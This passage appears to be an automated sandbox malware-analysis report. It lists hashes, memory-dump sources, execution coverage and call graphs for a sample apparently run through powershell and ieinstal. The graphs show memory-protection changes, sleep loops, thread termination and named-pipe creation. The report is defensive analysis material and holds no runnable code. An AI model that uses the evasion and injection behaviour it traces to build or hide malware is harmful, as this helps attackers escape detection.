                            • Opcode ID: 872e9fdd1dc5b9bc72f1627de24a81da9c76c6e36d218859a436b0e14ba0c975
                            • Instruction ID: b37a078a709cf096b92455efca24be3af96d5944c4d840567d95cff545f7fb08
                            • Opcode Fuzzy Hash: 872e9fdd1dc5b9bc72f1627de24a81da9c76c6e36d218859a436b0e14ba0c975
                            • Instruction Fuzzy Hash: AF221B74A042588FCB55EFB4C8547EEBBF2EF88305F1089A8D01AAB394DB355E458F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,tm$^Gl$^Gl
                            • API String ID: 0-947613015
                            • Opcode ID: 5dbf671f199882ab5ab12a5a2462724c01444d54ad66b7b0959b8cfde87fb54c
                            • Instruction ID: e4ea2c9e5730031ae8156e12bd48a89bf3ca5944363294e69924b053c27de1d8
                            • Opcode Fuzzy Hash: 5dbf671f199882ab5ab12a5a2462724c01444d54ad66b7b0959b8cfde87fb54c
                            • Instruction Fuzzy Hash: 8E915A34A102148FDB24DFB4D954AAEBBF6AF88311F158469E909EB395DF30DC81CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 11b2e9d05ee878e158117832dac81c8387def8182cde7d373101916dfb57b262
                            • Instruction ID: f441173eb2f52bb7d8d8dc8579923c799335bc8fb8ba7fccd7ca6962dacdb91a
                            • Opcode Fuzzy Hash: 11b2e9d05ee878e158117832dac81c8387def8182cde7d373101916dfb57b262
                            • Instruction Fuzzy Hash: A3024C34A043498FCB11CF64C480B9DFFB2AF85304F15C59AE949AB352DB71AD89CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c7fff7626cf5025381cd22f159e71a970d3ef894e6d1aeab2fb4229a2f1cc6f4
                            • Instruction ID: 530a6f974fec00554cd858237746917e0870aad2bd6f63a7b27ee7dd9e4050bd
                            • Opcode Fuzzy Hash: c7fff7626cf5025381cd22f159e71a970d3ef894e6d1aeab2fb4229a2f1cc6f4
                            • Instruction Fuzzy Hash: 5B819030B14245CBDB19CFA5C550BAEBBB2EF84315F10806DE906AB399DB74D986CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$`J$`J
                            • API String ID: 0-3850007678
                            • Opcode ID: e95b52487a36fe1bd58764c9eac087dedf829b20381838ab2071036608ae9d92
                            • Instruction ID: d93f5f1c9eb796987d0b40fddc510bb5e235e4fcdd81ee4f6a697783c1dde9a2
                            • Opcode Fuzzy Hash: e95b52487a36fe1bd58764c9eac087dedf829b20381838ab2071036608ae9d92
                            • Instruction Fuzzy Hash: 4E51EF307083458BDB149BB4D455AAF7FEAAFC5309F448D69D846CB391DF78E80A87A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$`J
                            • API String ID: 0-2501499896
                            • Opcode ID: b9ceb37070e4bd2ab0549f6fa83371d62ac1bc0b3e59af86a08cfd2103176ed5
                            • Instruction ID: ac23318b3d75b9880a93492dedc4c3d94acf12e26f60a3d2ada0c838308bef28
                            • Opcode Fuzzy Hash: b9ceb37070e4bd2ab0549f6fa83371d62ac1bc0b3e59af86a08cfd2103176ed5
                            • Instruction Fuzzy Hash: 9981D230B042148BCB18DBB9C5546AEBBF7AFC4305F548929D906AB384EF74ED468B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$$pm$$pm
                            • API String ID: 0-876320016
                            • Opcode ID: 56bda28ae5fd1f521a231795fa489cef18cf9157b4f4425e405a578d6280888b
                            • Instruction ID: c2f2920ff5b4fdfcc39af6a5522d55f5c8f5bb1fed94adb6ee963fa5af244049
                            • Opcode Fuzzy Hash: 56bda28ae5fd1f521a231795fa489cef18cf9157b4f4425e405a578d6280888b
                            • Instruction Fuzzy Hash: AF5147B1B20251DFC7188B78C8056AEB7A6EFC9721F14886DE506DB391DB34AC91C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J$`J$`J
                            • API String ID: 0-2501499896
                            • Opcode ID: 73239f7617decc677610b3879cf79f1059eaf95f0ea3ed7b943b761455219381
                            • Instruction ID: 31335435dcc59e78c3f0c5c36c54546b5f9a9257417fc5d7f9e3a0771f77d1a9
                            • Opcode Fuzzy Hash: 73239f7617decc677610b3879cf79f1059eaf95f0ea3ed7b943b761455219381
                            • Instruction Fuzzy Hash: 7451F871F142444FCB05ABB8D8142EE7FEAEF89315B04486DD909EB392DF385D458BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:46.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:34.8%
                            Total number of Nodes:23
                            Total number of Limit Nodes:2

                            Graph

                            execution_graph 90 b8b819 91 b8b955 TerminateThread 90->91 92 b8b995 91->92 101 b8bb69 103 b8bb70 101->103 102 b8bc09 103->102 104 b8bbae NtProtectVirtualMemory 103->104 105 b8badd 106 b8bae2 105->106 107 b8bb1e NtProtectVirtualMemory 106->107 108 b8bb04 Sleep 106->108 107->106 93 b8bb70 94 b8bc09 93->94 95 b8bb8d 93->95 95->94 96 b8bbae NtProtectVirtualMemory 95->96 109 b8b7d0 110 b8b7d4 109->110 110->110 111 b8b955 TerminateThread 110->111 112 b8b995 111->112 97 b8bae2 100 b8bae7 97->100 98 b8bb1e NtProtectVirtualMemory 98->100 99 b8bb04 Sleep 100->97 100->98 100->99

                            Callgraph

                            Executed Functions

                            Control-flow Graph

                            APIs
                            • Sleep.KERNEL32(00000005), ref: 00B8BB19
                            • NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 00B8BB54
                            Memory Dump Source
                            • Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd
                            Similarity
                            • API ID: MemoryProtectSleepVirtual
                            • String ID:
                            • API String ID: 3235210055-0
                            • Opcode ID: c25d4789d0ceeebebdf6a947ebfe35063d3abcefbacb07b0f54c02f73bd1c5e7
                            • Instruction ID: 9b31b3faacb870b64f8ca1d6337816cde6388cece3762bb6ec3c1f80a5d1be33
                            • Opcode Fuzzy Hash: c25d4789d0ceeebebdf6a947ebfe35063d3abcefbacb07b0f54c02f73bd1c5e7
                            • Instruction Fuzzy Hash: 9D0148B1A00B009FE748AE31898CF19B7A4AF10324F69C1C9E4215F0B2DB788880DF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 43 b8bb70-b8bb87 44 b8bc09-b8bc30 43->44 45 b8bb8d-b8bb90 43->45 45->44 46 b8bb92-b8bba7 call b8ba69 call b8ba9b 45->46 46->44 51 b8bba9-b8bbac 46->51 51->44 52 b8bbae-b8bc03 NtProtectVirtualMemory 51->52
                            APIs
                            • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00B8BBE7
                            Memory Dump Source
                            • Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: f7f762bfe15c72029af196966360ebf30a7d53c180c6dc8aecfd0cbebc04bfb6
                            • Instruction ID: 3b67db4555a14941580fbcacc9593470421f413b6b0b58f4164379ab53771538
                            • Opcode Fuzzy Hash: f7f762bfe15c72029af196966360ebf30a7d53c180c6dc8aecfd0cbebc04bfb6
                            • Instruction Fuzzy Hash: 871127F25003009FDB109A78CE91F493695EF26334BA583D5D926CB2F2D775C881CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 53 b8bb69-b8bb87 55 b8bc09-b8bc30 53->55 56 b8bb8d-b8bb90 53->56 56->55 57 b8bb92-b8bba7 call b8ba69 call b8ba9b 56->57 57->55 62 b8bba9-b8bbac 57->62 62->55 63 b8bbae-b8bc03 NtProtectVirtualMemory 62->63
                            APIs
                            • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00B8BBE7
                            Memory Dump Source
                            • Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: 4c9e167a47ac41b80354cabd86715b766d2781c211a0aaf7230ef369ee00ee5b
                            • Instruction ID: f600926654774e1526b9fbf134e08fb3c2aad9b632de0481c3dc76ea15c3db4c
                            • Opcode Fuzzy Hash: 4c9e167a47ac41b80354cabd86715b766d2781c211a0aaf7230ef369ee00ee5b
                            • Instruction Fuzzy Hash: DA01C0B25003009FDB14AB68CD86F493695FB16324B5243D9A9268B1B2D736D881CF20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 9 b8b819-b8b98d TerminateThread 11 b8b995-b8b9a3 9->11 12 b8ba49-b8ba66 11->12 13 b8b9a9-b8b9b0 11->13 13->12 14 b8b9b6-b8b9ba 13->14 14->12 15 b8b9c0-b8b9c4 14->15 15->12 16 b8b9ca-b8b9ce 15->16 16->12 17 b8b9d0-b8b9d4 16->17 17->12 18 b8b9d6-b8b9da 17->18 18->12 19 b8b9dc-b8b9e5 18->19 19->12 20 b8b9e7-b8b9fe 19->20 21 b8b9ff-b8ba0b 20->21 22 b8ba0d-b8ba11 21->22 23 b8ba16-b8ba46 21->23 22->12 24 b8ba13-b8ba14 22->24 24->21
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd
                            Similarity
                            • API ID: TerminateThread
                            • String ID:
                            • API String ID: 1852365436-0
                            • Opcode ID: 57e9f06e463720912d65eca2f6378d19613db71ff35884ac5f4ef1dc5ac69dd2
                            • Instruction ID: 96d6bd62504ad391fd1233ab884325a0edb1a91689a3a3abe67a1a238329c151
                            • Opcode Fuzzy Hash: 57e9f06e463720912d65eca2f6378d19613db71ff35884ac5f4ef1dc5ac69dd2
                            • Instruction Fuzzy Hash: 8751F5141A8A0B0DFB5C30478989FE82693D3B32D5FDCE7419C414D26B8E36D3A962C3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 25 b8b7d0-b8b7d1 26 b8b7d4-b8b7fd 25->26 26->26 27 b8b7ff-b8b9a3 TerminateThread 26->27 30 b8ba49-b8ba66 27->30 31 b8b9a9-b8b9b0 27->31 31->30 32 b8b9b6-b8b9ba 31->32 32->30 33 b8b9c0-b8b9c4 32->33 33->30 34 b8b9ca-b8b9ce 33->34 34->30 35 b8b9d0-b8b9d4 34->35 35->30 36 b8b9d6-b8b9da 35->36 36->30 37 b8b9dc-b8b9e5 36->37 37->30 38 b8b9e7-b8b9fe 37->38 39 b8b9ff-b8ba0b 38->39 40 b8ba0d-b8ba11 39->40 41 b8ba16-b8ba46 39->41 40->30 42 b8ba13-b8ba14 40->42 42->39
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd
                            Similarity
                            • API ID: TerminateThread
                            • String ID:
                            • API String ID: 1852365436-0
                            • Opcode ID: 9ef38afc7e4f56b3cf5879bd9b62b3cca6ff823f1804047de4b7fa707f713b5b
                            • Instruction ID: ca77afa5d633dff981eb0c827ce9beeb224e916b5e6f3de9f1bd210db507407d
                            • Opcode Fuzzy Hash: 9ef38afc7e4f56b3cf5879bd9b62b3cca6ff823f1804047de4b7fa707f713b5b
                            • Instruction Fuzzy Hash: 7731E331500342CFDB68DF78C998BA677E2EF55360F1992E9C849DB672D7358880C702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 64 b8badd 65 b8bae2-b8baf0 call b8ba9b 64->65 68 b8baf2 65->68 69 b8baf7-b8bb02 65->69 68->69 70 b8bb1e-b8bb64 NtProtectVirtualMemory call b8ba9b 69->70 71 b8bb04-b8bb19 Sleep 69->71 70->65
                            APIs
                            • Sleep.KERNEL32(00000005), ref: 00B8BB19
                            • NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 00B8BB54
                            Memory Dump Source
                            • Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd
                            Similarity
                            • API ID: MemoryProtectSleepVirtual
                            • String ID:
                            • API String ID: 3235210055-0
                            • Opcode ID: 7945a5768f9595802b75acdbb51162f1435fd580e520fbba767e268d23b03a84
                            • Instruction ID: b2aadfe6c94f06deb135c1f3fb8889a64b9e1b0a95331365846c2947fce3946a
                            • Opcode Fuzzy Hash: 7945a5768f9595802b75acdbb51162f1435fd580e520fbba767e268d23b03a84
                            • Instruction Fuzzy Hash: 9FE01260600B408BD748BF3085C9F287BA2AB84711F6AC0D9E1091A1B29B348880EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Execution Graph

                            Execution Coverage:8.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0.7%
                            Total number of Nodes:436
                            Total number of Limit Nodes:44

                            Graph

                            execution_graph 112413 4d11a40 112414 4d11a52 112413->112414 112416 4d14b90 GetFileAttributesW 112414->112416 112415 4d11a82 112416->112415 112243 829f42c 112244 829f43a 112243->112244 112245 829f3ea 112243->112245 112249 829f830 112245->112249 112253 829f840 112245->112253 112246 829f41f 112251 829f854 112249->112251 112250 829f860 112250->112246 112251->112250 112257 829fab0 112251->112257 112254 829f854 112253->112254 112255 829f860 112254->112255 112256 829fab0 CreateNamedPipeW 112254->112256 112255->112246 112256->112255 112258 829fa7a 112257->112258 112259 829faba 112257->112259 112258->112250 112263 81c1470 112259->112263 112268 81c1480 112259->112268 112260 829fb01 112260->112250 112264 81c1480 112263->112264 112266 81c1502 112264->112266 112273 81c2e5a 112264->112273 112265 81c14f5 112265->112260 112266->112260 112266->112266 112269 81c1499 112268->112269 112271 81c1502 112269->112271 112272 81c2e5a CreateNamedPipeW 112269->112272 112270 81c14f5 112270->112260 112271->112260 112272->112270 112274 81c2e8e 112273->112274 112275 81c2fdd 112274->112275 112276 81c31cb CreateNamedPipeW 112274->112276 112275->112265 112277 81c322a 112276->112277 112278 89d169b 112282 89d6523 112278->112282 112287 89d6538 112278->112287 112279 89d16a6 112283 89d6538 112282->112283 112284 89d65de 112283->112284 112293 89d5a18 112283->112293 112299 89d5a58 112283->112299 112284->112279 112288 89d6561 112287->112288 112289 89d67c3 112287->112289 112290 89d65de 112288->112290 112291 89d5a18 GetFileAttributesW 112288->112291 112292 89d5a58 GetFileAttributesW 112288->112292 112290->112279 112291->112290 112292->112290 112294 89d5a1d 112293->112294 112295 89d5c10 112294->112295 112305 89d3e08 112294->112305 112312 89d3fb1 112294->112312 112319 89d3df8 112294->112319 112300 89d5a80 112299->112300 112301 89d5c10 112300->112301 112302 89d3df8 GetFileAttributesW 112300->112302 112303 89d3e08 GetFileAttributesW 112300->112303 112304 89d3fb1 GetFileAttributesW 112300->112304 112302->112301 112303->112301 112304->112301 112306 89d3e44 112305->112306 112327 89d2fbf 112306->112327 112332 89d2c49 112306->112332 112337 89d2c58 112306->112337 112342 89d2e1f 112306->112342 112307 89d4097 112313 89d3fbf 112312->112313 112315 89d2e1f GetFileAttributesW 112313->112315 112316 89d2fbf GetFileAttributesW 112313->112316 112317 89d2c49 GetFileAttributesW 112313->112317 112318 89d2c58 GetFileAttributesW 112313->112318 112314 89d4097 112315->112314 112316->112314 112317->112314 112318->112314 112320 89d3d71 112319->112320 112321 89d3e06 112319->112321 112320->112295 112323 89d2e1f GetFileAttributesW 112321->112323 112324 89d2fbf GetFileAttributesW 112321->112324 112325 89d2c49 GetFileAttributesW 112321->112325 112326 89d2c58 GetFileAttributesW 112321->112326 112322 89d4097 112323->112322 112324->112322 112325->112322 112326->112322 112328 89d2faa 112327->112328 112329 89d2ccf 112327->112329 112328->112328 112329->112328 112347 89d25a0 112329->112347 112357 89d2581 112329->112357 112334 89d2c58 112332->112334 112333 89d2faa 112333->112333 112334->112333 112335 89d2581 GetFileAttributesW 112334->112335 112336 89d25a0 GetFileAttributesW 112334->112336 112335->112334 112336->112334 112338 89d2faa 112337->112338 112339 89d2c81 112337->112339 112338->112338 112339->112338 112340 89d2581 GetFileAttributesW 112339->112340 112341 89d25a0 GetFileAttributesW 112339->112341 112340->112339 112341->112339 112343 89d2ccf 112342->112343 112344 89d2faa 112343->112344 112345 89d2581 GetFileAttributesW 112343->112345 112346 89d25a0 GetFileAttributesW 112343->112346 112345->112343 112346->112343 112348 89d25c7 112347->112348 112349 89d25f0 112348->112349 112351 89d2581 GetFileAttributesW 112348->112351 112352 89d25a0 GetFileAttributesW 112348->112352 112349->112329 112350 89d2748 112350->112349 112367 89f0fa0 112350->112367 112371 89f0e90 112350->112371 112376 89f0e80 112350->112376 112381 89f0f02 112350->112381 112351->112350 112352->112350 112366 89d25a0 112357->112366 112358 89d2748 112359 89d25f0 112358->112359 112362 89f0f02 GetFileAttributesW 112358->112362 112363 89f0e90 GetFileAttributesW 112358->112363 112364 89f0e80 GetFileAttributesW 112358->112364 112365 89f0fa0 GetFileAttributesW 112358->112365 112359->112329 112360 89d2581 GetFileAttributesW 112360->112358 112361 89d25a0 GetFileAttributesW 112361->112358 112362->112359 112363->112359 112364->112359 112365->112359 112366->112359 112366->112360 112366->112361 112368 89f0fb1 112367->112368 112386 89f03f0 112368->112386 112372 89f0f15 112371->112372 112373 89f0eb9 112371->112373 112372->112349 112373->112372 112375 89f03f0 GetFileAttributesW 112373->112375 112374 89f0fef 112374->112349 112375->112374 112378 89f0e90 112376->112378 112377 89f0f15 112377->112349 112378->112377 112380 89f03f0 GetFileAttributesW 112378->112380 112379 89f0fef 112379->112349 112380->112379 112383 89f0f0a 112381->112383 112382 89f0f15 112382->112349 112383->112382 112385 89f03f0 GetFileAttributesW 112383->112385 112384 89f0fef 112384->112349 112385->112384 112387 89f03ff 112386->112387 112388 89f044e 112387->112388 112390 89f0338 112387->112390 112388->112349 112391 89f0360 112390->112391 112392 89f0375 112391->112392 112395 89dfbf8 112391->112395 112400 89dfc08 112391->112400 112396 89dfbd0 112395->112396 112397 89dfc06 112395->112397 112396->112392 112398 89dfc4a 112397->112398 112404 4d14b90 112397->112404 112398->112392 112401 89dfc1b 112400->112401 112402 89dfc4a 112400->112402 112403 4d14b90 GetFileAttributesW 112401->112403 112402->112392 112403->112402 112405 4d14b94 112404->112405 112406 4d14b48 112405->112406 112407 4d14c58 GetFileAttributesW 112405->112407 112408 4d14c48 GetFileAttributesW 112405->112408 112406->112398 112407->112406 112408->112406 112471 89889c0 112472 8988a5f 112471->112472 112473 89889e9 112471->112473 112473->112472 112478 898d989 112473->112478 112486 898d6d0 112473->112486 112498 898d6c0 112473->112498 112509 898d728 112473->112509 112479 898d946 112478->112479 112480 898d96b 112479->112480 112520 898ef8b 112479->112520 112524 898f150 112479->112524 112528 898f140 112479->112528 112532 898ef30 112479->112532 112536 898ef40 112479->112536 112487 898d6e2 112486->112487 112488 898d702 112486->112488 112487->112472 112490 898d762 112488->112490 112582 898aa08 112488->112582 112490->112472 112491 898d8f5 112492 898d96b 112491->112492 112493 898ef8b GetFileAttributesW 112491->112493 112494 898ef30 GetFileAttributesW 112491->112494 112495 898ef40 GetFileAttributesW 112491->112495 112496 898f150 GetFileAttributesW 112491->112496 112497 898f140 GetFileAttributesW 112491->112497 112493->112492 112494->112492 112495->112492 112496->112492 112497->112492 112499 898d6c5 112498->112499 112500 898aa08 GetFileAttributesW 112499->112500 112501 898d6e2 112499->112501 112502 898d8f5 112500->112502 112501->112472 112503 898d96b 112502->112503 112504 898ef8b GetFileAttributesW 112502->112504 112505 898ef30 GetFileAttributesW 112502->112505 112506 898ef40 GetFileAttributesW 112502->112506 112507 898f150 GetFileAttributesW 112502->112507 112508 898f140 GetFileAttributesW 112502->112508 112504->112503 112505->112503 112506->112503 112507->112503 112508->112503 112510 898d74d 112509->112510 112511 898aa08 GetFileAttributesW 112510->112511 112512 898d762 112510->112512 112513 898d8f5 112511->112513 112512->112472 112514 898d96b 112513->112514 112515 898ef8b GetFileAttributesW 112513->112515 112516 898ef30 GetFileAttributesW 112513->112516 112517 898ef40 GetFileAttributesW 112513->112517 112518 898f150 GetFileAttributesW 112513->112518 112519 898f140 GetFileAttributesW 112513->112519 112515->112514 112516->112514 112517->112514 112518->112514 112519->112514 112521 898ef90 112520->112521 112522 898eff7 112521->112522 112540 898c40e 112521->112540 112522->112480 112525 898f16a 112524->112525 112526 898f21c 112525->112526 112527 898c40e GetFileAttributesW 112525->112527 112526->112480 112527->112526 112529 898f16a 112528->112529 112530 898f21c 112529->112530 112531 898c40e GetFileAttributesW 112529->112531 112530->112480 112531->112530 112533 898ef40 112532->112533 112534 898ef6d 112533->112534 112535 898c40e GetFileAttributesW 112533->112535 112534->112480 112535->112534 112538 898ef66 112536->112538 112537 898ef6d 112537->112480 112538->112537 112539 898c40e GetFileAttributesW 112538->112539 112539->112537 112541 898c417 112540->112541 112542 898c4da 112541->112542 112545 898b778 112541->112545 112551 898b788 112541->112551 112546 898b7ac 112545->112546 112557 898b6e8 112546->112557 112562 898b3d4 112546->112562 112572 898b3e8 112546->112572 112547 898b7bd 112547->112542 112552 898b7ac 112551->112552 112554 898b3e8 GetFileAttributesW 112552->112554 112555 898b6e8 GetFileAttributesW 112552->112555 112556 898b3d4 GetFileAttributesW 112552->112556 112553 898b7bd 112553->112542 112554->112553 112555->112553 112556->112553 112558 898b71e 112557->112558 112560 898b3e8 GetFileAttributesW 112558->112560 112561 898b3d4 GetFileAttributesW 112558->112561 112559 898b756 112559->112547 112560->112559 112561->112559 112563 898b3e8 112562->112563 112564 898b42f 112563->112564 112565 898b6c4 112563->112565 112570 4d15078 GetFileAttributesW 112564->112570 112571 4d15018 GetFileAttributesW 112564->112571 112568 898b3e8 GetFileAttributesW 112565->112568 112569 898b3d4 GetFileAttributesW 112565->112569 112566 898b756 112566->112547 112567 898b457 112567->112547 112568->112566 112569->112566 112570->112567 112571->112567 112573 898b413 112572->112573 112574 898b42f 112573->112574 112575 898b6c4 112573->112575 112578 4d15078 GetFileAttributesW 112574->112578 112579 4d15018 GetFileAttributesW 112574->112579 112580 898b3e8 GetFileAttributesW 112575->112580 112581 898b3d4 GetFileAttributesW 112575->112581 112576 898b457 112576->112547 112577 898b756 112577->112547 112578->112576 112579->112576 112580->112577 112581->112577 112584 898aa1e 112582->112584 112583 898aa8a 112583->112491 112584->112583 112587 898a488 112584->112587 112597 898a478 112584->112597 112588 898a4ae 112587->112588 112589 898a4df 112588->112589 112590 898a8c3 112588->112590 112607 8989ef8 112589->112607 112612 8989f08 112589->112612 112591 898a94e 112590->112591 112593 898a488 GetFileAttributesW 112590->112593 112594 898a478 GetFileAttributesW 112590->112594 112591->112583 112592 898a53c 112592->112583 112593->112591 112594->112591 112598 898a488 112597->112598 112599 898a4df 112598->112599 112600 898a8c3 112598->112600 112605 8989ef8 GetFileAttributesW 112599->112605 112606 8989f08 GetFileAttributesW 112599->112606 112601 898a94e 112600->112601 112603 898a488 GetFileAttributesW 112600->112603 112604 898a478 GetFileAttributesW 112600->112604 112601->112583 112602 898a53c 112602->112583 112603->112601 112604->112601 112605->112602 112606->112602 112608 8989f08 112607->112608 112609 8989f35 112608->112609 112617 8988f48 112608->112617 112624 8988f38 112608->112624 112609->112592 112613 8989f2f 112612->112613 112614 8989f35 112612->112614 112613->112614 112615 8988f38 GetFileAttributesW 112613->112615 112616 8988f48 GetFileAttributesW 112613->112616 112614->112592 112615->112614 112616->112614 112618 8988f65 112617->112618 112619 89890c0 112618->112619 112620 8988e78 GetFileAttributesW 112618->112620 112622 4d15018 GetFileAttributesW 112618->112622 112623 8988e67 GetFileAttributesW 112618->112623 112631 8988ec0 112618->112631 112619->112609 112620->112618 112622->112618 112623->112618 112625 8988f48 112624->112625 112626 89890c0 112625->112626 112627 8988e78 GetFileAttributesW 112625->112627 112628 8988ec0 GetFileAttributesW 112625->112628 112629 4d15018 GetFileAttributesW 112625->112629 112630 8988e67 GetFileAttributesW 112625->112630 112626->112609 112627->112625 112628->112625 112629->112625 112630->112625 112633 8988e78 GetFileAttributesW 112631->112633 112634 8988e67 GetFileAttributesW 112631->112634 112632 8988ee4 112632->112618 112633->112632 112634->112632 112409 7b929b0 112410 7b92a31 IdentifyCodeAuthzLevelW 112409->112410 112412 7b92ad7 112410->112412 112417 7b961a0 112418 7b961e8 ComputeAccessTokenFromCodeAuthzLevel 112417->112418 112419 7b96225 112418->112419 112425 7b96980 112426 7b969c6 GetSystemInfo 112425->112426 112427 7b969f6 112426->112427 112635 829ac52 112636 829acd9 112635->112636 112637 829ac5a 112635->112637 112640 829bb46 112637->112640 112641 829bb4f 112640->112641 112645 829e1f0 112641->112645 112650 829e200 112641->112650 112642 829ac6b 112646 829e199 112645->112646 112647 829e1fa 112645->112647 112646->112642 112648 829e217 112647->112648 112655 829eb78 112647->112655 112648->112642 112651 829e20f 112650->112651 112652 829e21b 112650->112652 112653 829eb78 GetFileAttributesW 112651->112653 112654 829e217 112651->112654 112652->112642 112653->112654 112654->112642 112656 829ebb2 112655->112656 112657 829ec2f 112655->112657 112656->112657 112660 81c1b60 112656->112660 112666 81c1b50 112656->112666 112657->112648 112661 81c1b79 112660->112661 112672 8985778 112661->112672 112682 898576a 112661->112682 112692 898583f 112661->112692 112662 81c1d2c 112662->112657 112667 81c1b43 112666->112667 112667->112666 112669 8985778 GetFileAttributesW 112667->112669 112670 898576a GetFileAttributesW 112667->112670 112671 898583f GetFileAttributesW 112667->112671 112668 81c1d2c 112668->112657 112669->112668 112670->112668 112671->112668 112674 89857a9 112672->112674 112673 8985927 112673->112662 112674->112673 112702 8989629 112674->112702 112708 89897c0 112674->112708 112714 8989491 112674->112714 112725 898973c 112674->112725 112731 898972f 112674->112731 112737 89897ca 112674->112737 112743 89899cc 112674->112743 112684 8985778 112682->112684 112683 8985927 112683->112662 112684->112683 112685 8989629 GetFileAttributesW 112684->112685 112686 89897ca GetFileAttributesW 112684->112686 112687 89899cc GetFileAttributesW 112684->112687 112688 898973c GetFileAttributesW 112684->112688 112689 898972f GetFileAttributesW 112684->112689 112690 89897c0 GetFileAttributesW 112684->112690 112691 8989491 GetFileAttributesW 112684->112691 112685->112683 112686->112683 112687->112683 112688->112683 112689->112683 112690->112683 112691->112683 112694 8985844 112692->112694 112693 8985927 112693->112662 112694->112693 112695 8989629 GetFileAttributesW 112694->112695 112696 89897ca GetFileAttributesW 112694->112696 112697 89899cc GetFileAttributesW 112694->112697 112698 898973c GetFileAttributesW 112694->112698 112699 898972f GetFileAttributesW 112694->112699 112700 89897c0 GetFileAttributesW 112694->112700 112701 8989491 GetFileAttributesW 112694->112701 112695->112693 112696->112693 112697->112693 